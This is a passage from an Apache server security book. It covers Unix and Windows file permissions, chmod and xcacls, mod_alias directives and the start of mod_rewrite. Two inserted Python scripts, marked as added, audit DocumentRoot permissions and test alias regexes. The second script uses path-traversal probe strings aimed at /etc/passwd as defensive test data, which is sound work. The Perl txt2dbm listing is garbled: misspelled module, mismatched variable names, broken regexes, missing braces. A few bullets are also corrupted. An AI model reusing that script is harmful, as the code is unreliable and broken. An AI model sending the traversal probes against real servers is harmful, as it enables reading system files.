compatible, and includes IPv6, IP Security, IP multicast, and large windows. 
The suite runs on HP-UX 11, Mac OS, Linux, Microsoft Windows NT, Wind 
River VxWorks, and SCO UnixWare. Learn more at http://www.mentat.com/tcp/tcp.html. 

Microsoft: Microsoft Research (MSR) offers an IPv6 implementation. Check out the 
research page at http://www.research.microsoft.com/msripv6/msripv6.htm. 

Nokia: Nokia is working on integrated IPv6 support in its wireless product line. Learn 
more about those efforts here: http://www.nokia.com/ipv6/index.html. 

OS/390: IPv6 for OS/390 provides an implementation of IPv4 and IPv6 for OS/390. It 
is a Physical File System for OS/390 UNIX System Services that supports 
AF_INET, AF_INET6, and AF_ROUTE socket address families. Learn more at 
http://www-3.ibm.com/software/network/commserver/library/publications/ipv6.html. 

Sun: Sun Microsystems, with Solaris 8, offers integrated IPv6 support. Learn more 
at http://www.sun.com/solaris/ipv6/. 

Toolnet6: Hitachi's Toolnet6 provides IPv6 connectivity for Windows PCs. Applications 
running on Windows 95, 98, or NT can access both IPv4 and IPv6 networks 
using Toolnet6. Get it here for free: http://www.hitachi.co.jp/Prod/comp/network/pexv6-e.htm. 

Trumpet: Trumpet integrated IPv6 into the Trumpet Winsock, Fanfare, and PETROS 
product lines. Learn more at http://www.trumpet.com.au/ipv6.htm. 
Summary 

For now, IPv6 support is overkill and represents forward thinking. In the future, 
though, IPv6 support will be essential, especially for applications that handle packets 
routed through proxies or other gateways (applications like Apache). 


Now that we’ve covered both third-party and Apache native security issues and 
features, it’s time to examine general administration of Apache Web Server. That’s 
what the next chapter is all about. 
Overlording Apache Server: General Administration 


This chapter looks at general Apache administration and 
the tools that you’ll use most often to configure, run, and 
maintain your system. 


Permissions and Apache Server 


Your operating system’s permissions have a strong bearing 
on Apache’s security. Here’s why: Files that Apache oper- 
ates on carry operating system-level permissions. Attackers 
can penetrate system security, execute commands, or gain 
unauthorized access to files and directories and generally 
wreak havoc if such permissions are lax. 


For example: 


• Independent researchers recently found that NAI PGP Keyserver 7.0 and 7.0.1 
files had erroneous permissions. Thus, attackers, going through Apache and 
using a custom URL, could turn the service on and off. 

• Conectiva Linux 5.1, 5.6, and 6.0 unpacked /var/log/mysql world-readable. 
This was an issue because /var/log/mysql contains significant intelligence 
(such as usernames, passwords, and even account creation). 

• DOOW versions prior to v0.2.2 (DOOW is a tool for building knowledge bases 
with MySQL) didn't aggressively check user permissions. Thus, attackers could 
gain elevated access. 

• MySQL 3.20.32a and 3.23.34 both harbored a hole whereby local users could 
attack MySQL and ultimately the underlying system. Local users who had 
CREATE TABLE permissions could link to a root-writable file in /var/tmp to 
overwrite data in a specified table of the same name. 

• WinMySQLadmin, a tool that enables Windows users to comfortably manage 
remote MySQL databases, stored passwords in my.ini in clear text. This file was 
world-readable, thus exposing passwords to any local user. 


IN THIS CHAPTER 
• Permissions and Apache Server 
• URL Mapping and Security 
• Resource Usage 
• Apache Server Tools 


However, it needn’t be Apache or even third-party software that has bad permissions 
that weaken system security. This issue can just as easily arise in your homegrown 
software. Thus, even though it’s tedious, I elected to quickly revisit permission 
concepts here. 


We'll focus on two operating systems: 

• Permissions and ownership in Unix 
• Permissions and ownership in Windows 


Permissions and Ownership in Unix 


In Unix, three basic permission types exist: 

• Read: These enable users to read the specified file. 
• Write: These enable users to alter the specified file. 
• Execute: These enable users to execute the specified file (or, for a directory, 
to enter it). 


When you assign these permissions, Unix retains a record and later reflects it in file 
listings. It expresses each file's permission status in tokens. The three basic tokens 
that correspond to read, write, and execute are 

• r—READ access 
• w—WRITE access 
• x—EXECUTE access 


A typical directory listing: 


drwxrwxr-x    3 Nicole   Nicole      1024 Jan 18 13:10 . 
drwxr-xr-x   15 root     root        1024 Jan 14 23:22 .. 
-rw-rw-r--    1 Nicole   Nicole       173 Jan 18 12:36 .bash_history 
-rw-r--r--    1 Nicole   Nicole       674 Jan  5 13:10 .bashrc 
-rw-r--r--    1 Nicole   Nicole       602 Jan  5 13:10 .cshrc 
-rw-r--r--    1 Nicole   Nicole       116 Jan  5 13:10 .login 
-rw-r--r--    1 Nicole   Nicole       234 Jan  5 13:10 .profile 
drwxr-xr-x    3 Nicole   Nicole      1024 Jan  7 22:07 lg 
-rwxrwxr-x    1 Nicole   Nicole        45 Jan 18 13:07 parse_out.pl 


We’ll use Nicole’s Perl script as our example: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


Look at the far-left column to see the permissions: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


The first character specifies the resource type. In this field: 

• - represents a regular file 
• b represents a block-special file 
• c represents a character-special file 
• d represents a directory 
• l represents a symbolic link 


The nine remaining characters are split into three groups of three: 

• The owner's permissions—These permissions show the file owner's access. 
• Group permissions—These permissions show the file group's access. 
• World permissions—These permissions show what rights, if any, the rest of the 
world has to access this file. 


Let’s apply those rules to Nicole’s Perl script. We can see, for example, that this 


resource is a file: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


Nicole (the file’s owner) has full access rights. She can read, write, and execute this 
file: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


Likewise, group users (in group Nicole) can also read, write, and execute the file: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 
And finally, others (not Nicole and those who do not belong to her group) can only 
read and execute the file. They cannot write it: 


-rwxrwxr-x 1 Nicole Nicole 45 Jan 18 13:07 parse_out.pl 


So: 


• The first character tells you the type of file you're dealing with, typically a 
regular file (-) or a directory (d). 
• The next three characters tell you the owner's privileges. 
• The second set of three tells you the group's privileges. 
• The last set of three tells you the world's privileges. 


chmod: Changing File Permissions in Unix 
To change permissions on a Unix file or directory, use chmod. chmod accepts three 
operators, which each perform a different function: -, +, and =. 

• The - symbol removes permissions. 
• The + symbol adds permissions. 
• The = symbol assigns permissions exactly, replacing whatever was set before. 


Table 8.1 summarizes what permissions these operators can remove, add, or assign. 


TABLE 8.1 chmod Permissions 

chmod Permission   Explanation 
r                  The r character adds or subtracts READ permission. Example: chmod +r 
                   filename adds the READ permission to filename. 
w                  The w character adds or subtracts WRITE permission. Example: chmod -w 
                   filename takes away write permission from filename. 
x                  The x character adds or subtracts EXECUTE permission. Example: chmod +x 
                   filename adds the EXECUTE permission to filename. 

Without a leading u, g, or o, these examples apply to the owner, the group, and the 
world at once (subject to your umask); chmod o-w filename removes only the world's 
write bit. 





Using letters (r, w, x) to assign permissions on individual files and directories is one 
method. Another is the octal system, where you add octals together to produce a 
final permission set. 


The Octal System 
In the octal system, numbers represent permissions. Table 8.2 summarizes the octal 
scheme and what each number represents. 
TABLE 8.2 Octal Values 

Octal Value   Explanation 
0000          Equivalent to ---, or no permissions at all. 
0001          EXECUTE permission for the world (the third set of three is --x). 
0002          WRITE permission for the world (the third set of three is -w-). 
0004          READ permission for the world (the third set of three is r--). 
0010          EXECUTE permission for the group (the second set of three is --x). 
0020          WRITE permission for the group (the second set of three is -w-). 
0040          READ permission for the group (the second set of three is r--). 
0100          EXECUTE permission for the file's owner (the first set of three is --x). 
0200          WRITE permission for the file's owner (the first set of three is -w-). 
0400          READ permission for the file's owner (the first set of three is r--). 

The lowest of the three digits belongs to the world, the middle one to the group, and 
the highest to the owner; the leading 0 holds the setuid, setgid, and sticky bits, 
which are all clear here. 

When using hard octal values, you add them together, thus deriving a final number 
that expresses all permissions granted. But you needn't complicate it that much. You 
can reduce permissions for owner, group, and others to a three-digit number, using 
these values: 

• 0 = no permissions 
• 1 = execute 
• 2 = write 
• 3 = write and execute (not used much these days) 
• 4 = read 
• 5 = read and execute 
• 6 = read and write 
• 7 = the whole shebang: read, write, and execute 


For example, perhaps you've developed a script. To make your script available to all 
users, you could do something like this: 


chmod 751 myscript.cgi 


In this case, myscript.cgi carries the following permissions: 

• The owner can read, write, and execute it (7) 
• The group can read and execute it (5) 
• The world (outsiders) can only execute it (1) 


NOTE 

Note that if you need to change permissions to many files nested in multiple subdirectories of 
a directory tree, use chmod’s -R flag. This forces a recursive alteration of permissions on all files 
matching your criteria, in all subdirectories subordinate to where chmod starts its work. 





Permissions and Ownership in Windows 

Windows releases (NT, 2000, and XP) embed permission controls into the system 
core. When you develop a Windows application, you'll include WINNT.H. There, 
you'll find the hard technical information on Windows access control. 


When Windows creates a securable object, it assigns to it a security descriptor. 
Inside the descriptor, the owner and primary group are identified by security 
identifiers (SIDs), and the access and audit rules by access control lists (ACLs). 
WINNT.H defines the security descriptor and its data types. 


The security descriptor's data structure is 


typedef struct _SECURITY_DESCRIPTOR { 
    BYTE                        Revision; 
    BYTE                        Sbz1;      /* "should be zero": padding */ 
    SECURITY_DESCRIPTOR_CONTROL Control; 
    PSID                        Owner; 
    PSID                        Group; 
    PACL                        Sacl; 
    PACL                        Dacl; 
} SECURITY_DESCRIPTOR, *PISECURITY_DESCRIPTOR; 


These fields store 

• Revision—The security descriptor's revision level, which provides a tracking or 
history mechanism. 

• Sbz1—Padding that should be zero (hence the name). 

• Control—The security descriptor's flags, which we'll discuss next. Such flags 
denote the circumstances under which the owner and group SIDs or the ACLs were 
derived, and whether the descriptor is stored in self-relative form. 

• Owner—Either a pointer or offset to the owner's SID or a null value. 

• Group—Either a pointer or offset to the primary group's SID or a null value. 

• Sacl—A pointer to the system ACL (System Access Control List), which controls 
auditing. 

• Dacl—A pointer to the discretionary ACL (Discretionary Access Control List), 
which controls access. 


Here's a list of control field flags and their significance: 

• SE_OWNER_DEFAULTED—A default mechanism (not the original owner provider) 
provided this owner SID. 

• SE_GROUP_DEFAULTED—A default mechanism (not the original group provider) 
provided this group SID. 

• SE_DACL_PRESENT—The security descriptor contains a DACL. 

• SE_DACL_DEFAULTED—A default mechanism (not the original owner provider) 
provided this DACL. 

• SE_SACL_PRESENT—The security descriptor contains a SACL. 

• SE_SACL_DEFAULTED—A default mechanism (not the original owner provider) 
provided this SACL. 

• SE_SELF_RELATIVE—The security descriptor is in self-relative form. 


Through this structure, Windows mediates every access to a securable object. For 
each such object, the DACL lists what users and groups can do. The basic permission 
groupings (the ones a file's Properties Security tab exposes) are: 

• Full Control—The specified user can read, write, execute, modify, and delete the 
specified object, and change its permissions or ownership 

• Modify—The specified user can read, write, execute, and delete the specified object 

• Read—The specified user can read the specified object 

• Read and Execute—The specified user can read and execute the specified object 

• Write—The specified user can write the specified object 


xcacls: Changing File Permissions in Windows 
xcacls enables you to change permissions (recursively if necessary). 


The syntax is 


C:\> xcacls filename [options] 


Table 8.3 summarizes xcacls options, arguments, and access masks. 
TABLE 8.3 xcacls Options, Arguments, and Access Masks 

Option or Argument         Meaning 
/C                         Ignores access errors and continues. 
/D user                    Denies the user access. 
/E                         Edits the target ACL instead of replacing it. Use this when 
                           ACEs exist that you don't want to nuke. 
/G user:permission;spec    Grants the specified user the specified permission to filename. 
/P user:permission;spec    Replaces the user's permissions as specified. 
/R user                    Revokes the user's access as specified. 
/T                         Performs a recursive search and change operation. Use this to 
                           apply your ACL/ACE changes in the current directory and all 
                           subdirectories within it. 
/Y                         Suppresses the confirmation prompt that Windows 2000 otherwise 
                           displays before replacing ACLs. 
filename                   Denotes the filename whose ACLs or ACEs you want to alter. 

Access Mask                Meaning 
C                          Change access. 
D                          Delete. 
E                          Read (special access). 
F                          Full control. 
O                          Take ownership of the specified object. 
P                          Change permissions. 
R                          Read access. 
W                          Write (special access). 
X                          Execute the specified file. 


An example: 


xcacls c:\winnt\system32\*.* /G users:RX /T /E 


Here, you grant the Users group read and execute permission on everything under 
c:\winnt\system32, recursing into its subdirectories (/T). Because /E edits the 
existing ACLs rather than replacing them, any other ACEs already on those files 
survive; leave /E off if you want the Users entry to be the only one, and expect a 
confirmation prompt unless you also pass /Y. 


Summary on Permissions 
Always apply sufficiently stringent permissions on files that Apache will process. 


Never allow a file to exist within your DocumentRoot structure that is either world- 
executable or world-writable. And, if you support user directories, frequently check 
permissions there, because users are less likely than you to know about permission 
safety. 
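An added example (not from the book) of the check this summary calls for: a Python script that walks a DocumentRoot tree, lists regular files with the world-write or world-execute bit set, and strips those bits with the equivalent of chmod o-wx. The sample tree built by make_demo_docroot() and its file names are constructed for the demonstration; point find_world_wx() at your real DocumentRoot (or at each user's public_html) to run the audit.

```python
"""Added example, not from the book: audit a DocumentRoot tree for files that
are world-writable or world-executable, and strip those bits.  The directory
layout built by make_demo_docroot() is constructed for the demo."""
import os
import stat
import tempfile

WORLD_WX = stat.S_IWOTH | stat.S_IXOTH   # o+w and o+x


def find_world_wx(root):
    """Return sorted paths (relative to root) of regular files whose mode has
    either the world-write or the world-execute bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)            # lstat: never follow symlinks
            if stat.S_ISREG(st.st_mode) and st.st_mode & WORLD_WX:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def strip_world_wx(root):
    """chmod o-wx every offending file; return the number of files changed."""
    changed = 0
    for rel in find_world_wx(root):
        path = os.path.join(root, rel)
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~WORLD_WX)
        changed += 1
    return changed


def make_demo_docroot():
    """Constructed sample tree: one safe file and two that violate the rule."""
    root = tempfile.mkdtemp(prefix="docroot-")
    os.makedirs(os.path.join(root, "uploads"))
    samples = {
        "index.html": 0o644,          # rw-r--r--  fine
        "uploads/notes.txt": 0o666,   # rw-rw-rw-  world-writable
        "tool.sh": 0o755,             # rwxr-xr-x  world-executable
    }
    for rel, mode in samples.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = make_demo_docroot()
    print("offending:", find_world_wx(demo))
    print("fixed:", strip_world_wx(demo), "remaining:", find_world_wx(demo))
```

Run it read-only first (find_world_wx alone) and review the list: a CGI directory that Apache's unprivileged user must execute from legitimately carries o+x, which is one reason to keep ScriptAlias targets outside DocumentRoot rather than exempt them from this check.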
URL Mapping and Security 


URL mapping, the capability to map one file or directory to another, is a key Apache 
feature. Initially, mapping seems straightforward. However, even such a seemingly 
simple operation can sometimes raise security issues. 


Apache performs mapping using five modules: 

• mod_alias 
• mod_rewrite 
• mod_speling 
• mod_userdir 
• mod_vhost_alias 


mod_alias 


mod_alias provides file, directory, and URL mapping and redirection. Note that in 
regards to redirection (and more complicated operations), you should rely more on 
mod_rewrite, which we’ll discuss later. However, mod_alias is a key mapping utility. 


You'll find mod_alias’s source in httpd-version/modules/mappers, in mod_alias.c. 
mod_alias directives enable you to manipulate URLs and map between URLs and file 
system paths, or designate a directory (the only directory) that can contain CGI. 


Apache constants that such directives can return include the following: 

• HTTP_GONE—Denotes HTTP Gone status (410). The requested resource is unavailable 
and left no forwarding address. 

• HTTP_MOVED_PERMANENTLY—Denotes HTTP Moved Permanently status (301). The 
requested resource has been assigned a new permanent URI. 

• HTTP_MOVED_TEMPORARILY—Denotes HTTP Moved Temporarily status (302). The 
requested resource resides temporarily at a different URI. 

• HTTP_SEE_OTHER—Denotes HTTP See Other status (303). The client should retrieve 
the document from the new URI with a GET. 


mod_alias directives are 

• Alias 
• AliasMatch 
• Redirect 
• RedirectMatch 
• ScriptAlias 
• ScriptAliasMatch 


Alias 

Alias lets you serve documents stored in the at-large file system instead of beneath 
DocumentRoot. URLs whose (%-decoded) path begins with URL-path map to local 
files under the directory or file you name. 


The syntax is 

Alias URL-path file-path | directory-path 

Here, URL-path is the path part of the request URL, and file-path or directory-path 
is the location in the file system you'd like such requests mapped to. 


For example, suppose you wanted http://www.yourhost.com/images to map 
internally to /usr/shared/images. You could articulate it this way: 


Alias /images /usr/shared/images 


AliasMatch 
AliasMatch is essentially Alias with regular expression power. Apache matches regex 
against the URL-path; file-path or directory-path may refer to the captured groups 
as $1, $2, and so on. 


The syntax is 


AliasMatch regex file-path | directory-path 


Here, regex is the pattern, and file-path and directory-path denote locations. For 
example, suppose you wanted to alias all files under /icons (in the site's URL space) 
to /usr/shared/icons. You could articulate it like this: 


AliasMatch ^/icons(.*) /usr/shared/icons$1 


After httpd restarts, requests for http://www.yourhost.com/icons/anything are mapped 
to /usr/shared/icons/anything. The ^ anchor matters: without it, the pattern also 
matches a URL that merely contains /icons somewhere in the middle of its path. 


NOTE 


Here are some caveats for directives that support regular expressions. First, you must observe 
case-sensitivity rules per your operating system. If you don’t, expect trouble. HFS+, for 
example, is not case sensitive while Apache is. Webmasters failing to observe this suffered 
attacks on Mac OS X. Also, carefully analyze your regex rules. Sometimes, a regex that looks 
okay is more sweeping than it initially seems. 
Redirect 
Redirect maps old URLs to new ones. Apache returns a new URL to the client, 
which, in turn, tries it. 


The syntax is 


Redirect [status] URL-path URL 


Here, status indicates one of four states: 

• gone—HTTP_GONE (410) 
• permanent—HTTP_MOVED_PERMANENTLY (301) 
• temp—HTTP_MOVED_TEMPORARILY (302) 
• seeother—HTTP_SEE_OTHER (303) 


If you omit status, Apache sends 302 (temp). Otherwise, URL-path is the path part 
of the request URL and URL is the absolute URL you'd like the client redirected to. 


For example: 


Redirect /documents http://www.foo.com/docs 


This redirects requests for http://www.yourhost.com/documents to 
http://www.foo.com/docs instead. 


RedirectMatch 


RedirectMatch is essentially Redirect with regular expression power. Apache applies 


the regex matching to URL-path and directory-path. 
The syntax is 


RedirectMatch [status] regex URL 


Here, status indicates one of four states: 
e gone—HTTP_GONE (410) 
e permanent—HTTP_MOVED_ PERMANENTLY (301) 
e temp—HTTP_MOVED_TEMPORARILY (302) 


e seeother—HTTP_SEE_OTHER (303) 


Otherwise, regex is the pattern and URL reflects where you'd like to redirect the 
request. For example, suppose you decided to establish a box strictly to serve images, 
and furthermore, you standardized all image files to JPEG format (where they were 
previously GIF). You could quickly make the change as follows: 


RedirectMatch (.*)\.gif$ http://images.yourhost.com$1.jpg 


Here, any request for a .gif file on your local system is redirected to the same path, 
with a .jpg extension, on images.yourhost.com; that host's DocumentRoot then serves 
it. 


NOTE 


Take care when applying regular expressions. Test them exhaustively before applying them on 
a production server. One slip and you might inadvertently expose sensitive areas to 
attackers. 





ScriptAlias 
ScriptAlias is essentially Alias, but additionally marks the target directory as one 
containing CGI scripts, which mod_cgi will execute rather than serve as files. 


The syntax is 

ScriptAlias URL-path file-path | directory-path 

Here, URL-path is the path portion of the URL, and file-path and directory-path 
represent where you'd like to map such requests. 


For example, suppose you'd like to restrict CGI scripts to the directory /www/cgi-bin. 
You could articulate that like this: 


ScriptAlias /cgi-bin/ /www/cgi-bin/ 


This would map any request to http://www.yourhost.com/cgi-bin/ to /www/cgi-bin/ 
in your internal directory structure. Keep that directory outside DocumentRoot: if the 
scripts also sit under DocumentRoot, a later configuration change (removing the 
ScriptAlias, say) can expose their source as ordinary files. 


NOTE 


Here's some historical trivia: ScriptAlias once had a hole. Apache 0.8.11 and 0.8.14 
harbored a weakness that allowed remote attackers to view CGI source code in any directory 
under DocumentRoot that the Apache configuration file had designated with a ScriptAlias 
directive. 


ScriptAliasMatch 
ScriptAliasMatch is essentially ScriptAlias with regular expression power. Apache 
matches the regex against the URL-path. 


The syntax is 


ScriptAliasMatch regex file-path | directory-path 




Here, regex is the pattern, whereas file-path and directory-path denote locations. 
For example, suppose you wanted to alias all scripts called from /cgi-bin to 
/www/cgi-bin. You could articulate that like this: 


ScriptAliasMatch ^/cgi-bin(.*) /www/cgi-bin$1 
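The cautions above (an unanchored or slash-less pattern is more sweeping than it looks; test before deploying) are easy to check offline. The following Python script is an added example, not code from this book or from Apache. It applies AliasMatch-style rules to constructed request paths the way the *Match directives do (a regex search against the URL path, with $N in the target replaced by the captures) and reports every translation that lands outside the directory you meant to expose. The three rule sets, the sample paths and the /usr/shared/icons root are assumptions taken from the examples above, and the cleanup it performs before translation (decode %XX escapes, collapse . and .. segments) only approximates the normalization Apache itself applies before a URL is translated. 

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed rule sets, modelled on the AliasMatch example above.
# Each entry is (regex, target); "$1" in the target is the first capture,
# exactly as in an AliasMatch, ScriptAliasMatch or RedirectMatch line.
LOOSE_RULES = [(r"/icons(.*)", "/usr/shared/icons$1")]       # no ^ anchor at all
BOOK_RULES = [(r"^/icons(.*)", "/usr/shared/icons$1")]       # anchored, slash not required
STRICT_RULES = [(r"^/icons/(.*)$", "/usr/shared/icons/$1")]  # anchored and slash-delimited

INTENDED_ROOT = "/usr/shared/icons"  # assumed: the only directory the admin meant to expose

SAMPLE_URIS = [  # constructed probes a scanner might send
    "/icons/apache_pb.gif",
    "/icons-private/secret.txt",
    "/private/icons-of-old/readme",
    "/icons/../../../etc/passwd",
    "/icons/%2e%2e/%2e%2e/etc/passwd",
]


def normalize_uri(uri):
    """Approximate the cleanup Apache applies before alias translation:
    drop the query string, decode %XX escapes, collapse '.' and '..' segments."""
    path = unquote(uri.split("?", 1)[0])
    norm = posixpath.normpath(path)
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def translate(rules, uri):
    """Return the filesystem path the first matching rule yields, or None.
    The *Match directives search for the regex anywhere in the path unless the
    pattern itself carries a ^ anchor, hence re.search rather than re.match."""
    path = normalize_uri(uri)
    for pattern, target in rules:
        match = re.search(pattern, path)
        if match:
            return re.sub(r"\$(\d)", lambda g: match.group(int(g.group(1))) or "", target)
    return None


def escapes(path, root):
    """True if path is neither root itself nor something beneath it."""
    norm = posixpath.normpath(path)
    root = posixpath.normpath(root)
    return norm != root and not norm.startswith(root + "/")


def audit(rules, root, uris):
    """Translate every sample URI and return the (uri, path) pairs that escape root."""
    findings = []
    for uri in uris:
        target = translate(rules, uri)
        if target is not None and escapes(target, root):
            findings.append((uri, target))
    return findings


if __name__ == "__main__":
    for name, rules in (("loose", LOOSE_RULES), ("book", BOOK_RULES), ("strict", STRICT_RULES)):
        hits = audit(rules, INTENDED_ROOT, SAMPLE_URIS)
        print(f"{name:6s} rule set: {len(hits)} escaping translation(s)")
        for uri, path in hits:
            print(f"    {uri} -> {path}")
```

Run it and the loose set reports two escapes (the sibling directory /usr/shared/icons-private and, because the pattern is unanchored, a path that merely contains /icons deeper in), the anchored pattern from the example above still reports the sibling, and only the slash-delimited pattern reports none. The dot-dot probes translate to nothing under any rule set because the collapse step runs first; Apache collapses those segments before translation too, which is why the sibling-directory case, not traversal, is the one to look for when you audit alias patterns. 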


mod_rewrite 


mod_rewrite is the heart of Apache's URL handling engine and as such, is capable of 
evaluating complicated regular expressions. As explained in Apache's documentation: 


This module uses a rule-based rewriting engine (based on a regular-expression parser) to 
rewrite requested URLs on the fly. It supports an unlimited number of rules and an unlimited 
number of attached rule conditions for each rule to provide a really flexible and powerful URL 
manipulation mechanism. The URL manipulations can depend on various tests, for instance 
server variables, environment variables, HTTP headers, time stamps, and even external 
database lookups in various formats can be used to achieve a really granular URL matching. 
This module operates on the full URLs (including the path-info part) both in per-server 
context (httpd.conf) and per-directory context (.htaccess) and can even generate 
query-string parts on result. The rewritten result can lead to internal sub-processing, 
external request redirection or even to an internal proxy throughput. 


You'll find mod_rewrite’s source in httpd-version/modules/mappers. 
You control mod_rewrite’s behavior with nine configuration directives: 

• RewriteEngine 
• RewriteOptions 
• RewriteLog 
• RewriteLogLevel 
• RewriteLock 
• RewriteMap 
• RewriteBase 
• RewriteCond 
• RewriteRule 

RewriteEngine 
RewriteEngine is the most important configuration directive because its status 
determines if Apache does rewriting at all. 


The syntax is 

RewriteEngine state 

Here, state is either on or off. As noted in Apache's documentation, "...If it is set to 
off this module does no runtime processing at all. It does not even update the 
SCRIPT_URx environment variables." Hence, if you want mod_rewrite to do anything, ensure 
that RewriteEngine is on. The default is off, and the setting is not inherited by virtual 
hosts, so each virtual host (and each .htaccess rule set) that rewrites needs its own 
RewriteEngine on. 


RewriteOptions 
RewriteOptions sets special options for the instant per-server or per-directory 
configuration. Options at this point include 


• inherit—This makes the current configuration inherit its parent's. That is, rules 
you specified in the enclosing context (the server configuration, or a parent 
directory such as DocumentRoot) are applied in the subordinate directory as well. 


The syntax is 
RewriteOptions Option 


Here, at this point, anyway, Option can only be inherit. However, that might change 
in the future. 


RewriteLog 

Use RewriteLog to set the file to which Apache logs rewriting actions. If you don't 
precede that name with a slash, Apache assumes that the location is relative to 
ServerRoot. 


The syntax is 

RewriteLog file-path 

Here, file-path is the rewrite log file’s location. For example, suppose you want to 
place that file in /var/log/rewrites/rwlog.log. You can articulate that as follows: 


RewriteLog "/var/log/rewrites/rwlog.log" 


NOTE 





Do not set the rewrite log to /dev/null: mod_rewrite still builds every log line internally and 
only then discards it, so you pay the cost without the benefit. To silence it, set 
RewriteLogLevel 0 instead. Also, ensure that only the user who starts httpd can write the 
log, and remember that the log records full request URLs, query strings included, so protect 
it as you would the access log. 

RewriteLogLevel 
Use RewriteLogLevel to set the verbosity level with which mod_rewrite writes logs 
into the rewriting log file. 


The syntax is 
RewriteLogLevel level 


Here, level is a numeric value from 0 to 9. 0 instructs Apache not to log at all, 
whereas level 9 forces it to log everything. 


RewriteLock 

Use RewriteLock to specify mod_rewrite's synchronization lock file. mod_rewrite needs 
this file to serialize its communication with external RewriteMap programs (the prg map 
type described later), so set it whenever you use one. Locate the file on a local drive 
(and not an NFS volume). Otherwise, if your NFS dies, so does your rewriting engine. 


The syntax is 

RewriteLock file-path 

Here, file-path is the location for mod_rewrite’s lock file. 

RewriteMap 

Use RewriteMap to define a named lookup table that your RewriteRule and RewriteCond 
directives can consult, using the notation ${MapName:key} (or ${MapName:key|default}) 
in a substitution or test string. 

The syntax is 

RewriteMap MapName MapType:MapSource 

Here, MapName is a string by which you'll refer to the map, MapType is the map's data 
format (see the following), and MapSource is the map's fully articulated path (or, for an 
internal function, the function's name). MapType can be 


• txt (standard plain text)—This points to a file that contains key/value pairs, 
one per line, separated by whitespace, in plain text. 

• rnd (randomized plain text)—This points to a file in the same format, except that 
a value may list several alternatives separated by pipes (dogs|canines|mutts). 
Apache will randomly pick one and rewrite the original term with that. 

• dbm (hash file)—This signifies a binary NDBM (the "New DBM" format) file 
containing the same contents as a plain text format file, but with quicker lookups. 
This is a database file format that handles key/data pairs quickly. See the following 
for an Apache-recommended Perl script for packaging such files. 

• int (internal function)—This signifies some internal Apache function, such as 
toupper, tolower, escape, or unescape. 

• prg (external program)—This is a program or script written for rewriting purposes. 
Apache starts it once, at server startup, and feeds it one lookup key per line on its 
standard input; the program must answer with exactly one line per key on its 
standard output. 


WARNING 


Take extreme care when relying on an external program because this could open many security 
holes, including DoS (your custom program eats too many system resources or stops answering, 
and every request that consults the map waits on it), failed matching or lexical mistakes (your 
matching logic is somehow screwy), and even shell exposure (you somehow wrote the program 
in such a way that attackers can break out of it). Remember that the lookup key is derived 
from the request, so never hand it to a shell or another interpreter unescaped, and make the 
program's output unbuffered so the server does not hang waiting for an answer. 





Apache’s team recommends the following script for generating NDBM files from 
plain text: 


#!/bin/perl 

## 

## = txt2dbm -- convert txt map to dbm format 
## 


use NDBM_File; 
use Fentl; 


($txtmap, $dommap) = @ARGV; 

open(TXT, "<$txtmap") or die "Couldn't open $txtmap!\n"; 

tie (%DB, 'NDBM_File', $dbmmap,0 RDWR|O TRUNC|O_CREAT, 0644) 
wor die "Couldn't create $dbmmap!\n"; 

while (<TXT>) { 


next if (/*\s*#/ or /*\s*$/); 
$DB{$1} = $2 if (/*\s*(\S+)\s+(\St)/); 


untie %DB; 
close(TXT); 


$ txt2dbm map.txt map.db 
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RewriteBase 
Use RewriteBase to set the base URL for per-directory rewrites. This is a tricky 
directive, and requires that you take into account any Alias directives you previously set. 


The syntax is 


RewriteBase URL-path 


Here, URL-path is the URL prefix that corresponds to the directory in which the 
per-directory rules live. mod_rewrite needs it because, in per-directory context, it 
strips the directory's filesystem prefix from the path before matching and must put a 
URL prefix back afterward; when the directory is reached through an Alias, the two 
differ. For example, suppose that you earlier made this declaration: 


Alias /www /www/docs 


This maps requests going to http://www.yourhost.com/www/ to the internal directory 
/www/docs. Given those circumstances, consider the implications of this rule set, placed 
in /www/docs/.htaccess: 


RewriteBase /www 
RewriteRule ^original\.html$ remapped.html 


Because your RewriteBase names the alias (and not a directory relative to 
DocumentRoot), the rewritten request becomes /www/remapped.html, which the Alias 
maps back to /www/docs/remapped.html. Omit the RewriteBase and mod_rewrite would 
reassemble the result from the filesystem prefix instead, yielding a URL that does not 
exist. This can get confusing, especially when you nest multiple RewriteBase 
instructions on a per-directory basis where you earlier specify aliases. Carefully consider 
your rules when using RewriteBase. 


RewriteCond 

RewriteCond is a powerful directive that lets you specify conditional rewriting. 
Suppose that on your site, you create different index pages for different browsers, as 
follows: 


• The index page for MSIE uses ActiveX. 
• The index page for Netscape uses Java. 
• The index page for Lynx uses neither. 


Now, what you'd like to do is have Apache automatically rewrite the request 
depending on what client your visitors use. To do so, you establish Apache's behavior 
in two phases: 


• Condition—If this happens... 
• Rule—Do this 

Let's stick with the previous example. Here's how you'd do it: 


RewriteCond %{HTTP_USER_AGENT} MSIE 
RewriteRule ^/$ /index.activex.html [L] 

RewriteCond %{HTTP_USER_AGENT} ^Mozilla.* 
RewriteRule ^/$ /index.java.html [L] 

RewriteCond %{HTTP_USER_AGENT} ^Lynx.* 
RewriteRule ^/$ /index.barebones.html [L] 


NOTE 


The [L] notation indicates "Last" or "Last Rule." See the following RewriteRule. Note also 
that the MSIE rule must come first and must not be anchored with ^: Internet Explorer's 
User-Agent string begins with "Mozilla/4.0 (compatible; MSIE ...)", so an anchored 
^Mozilla.* test would claim it. Finally, remember that the User-Agent header is whatever 
the client chooses to send; use it for convenience, never for access control. 





Table 8.4 lists the server and environment variables on which you can trigger RewriteCond. 


TABLE 8.4 Valid RewriteCond Environment Variable Triggers 

Variable                 Value 

API_VERSION              Stores the Apache module API version 
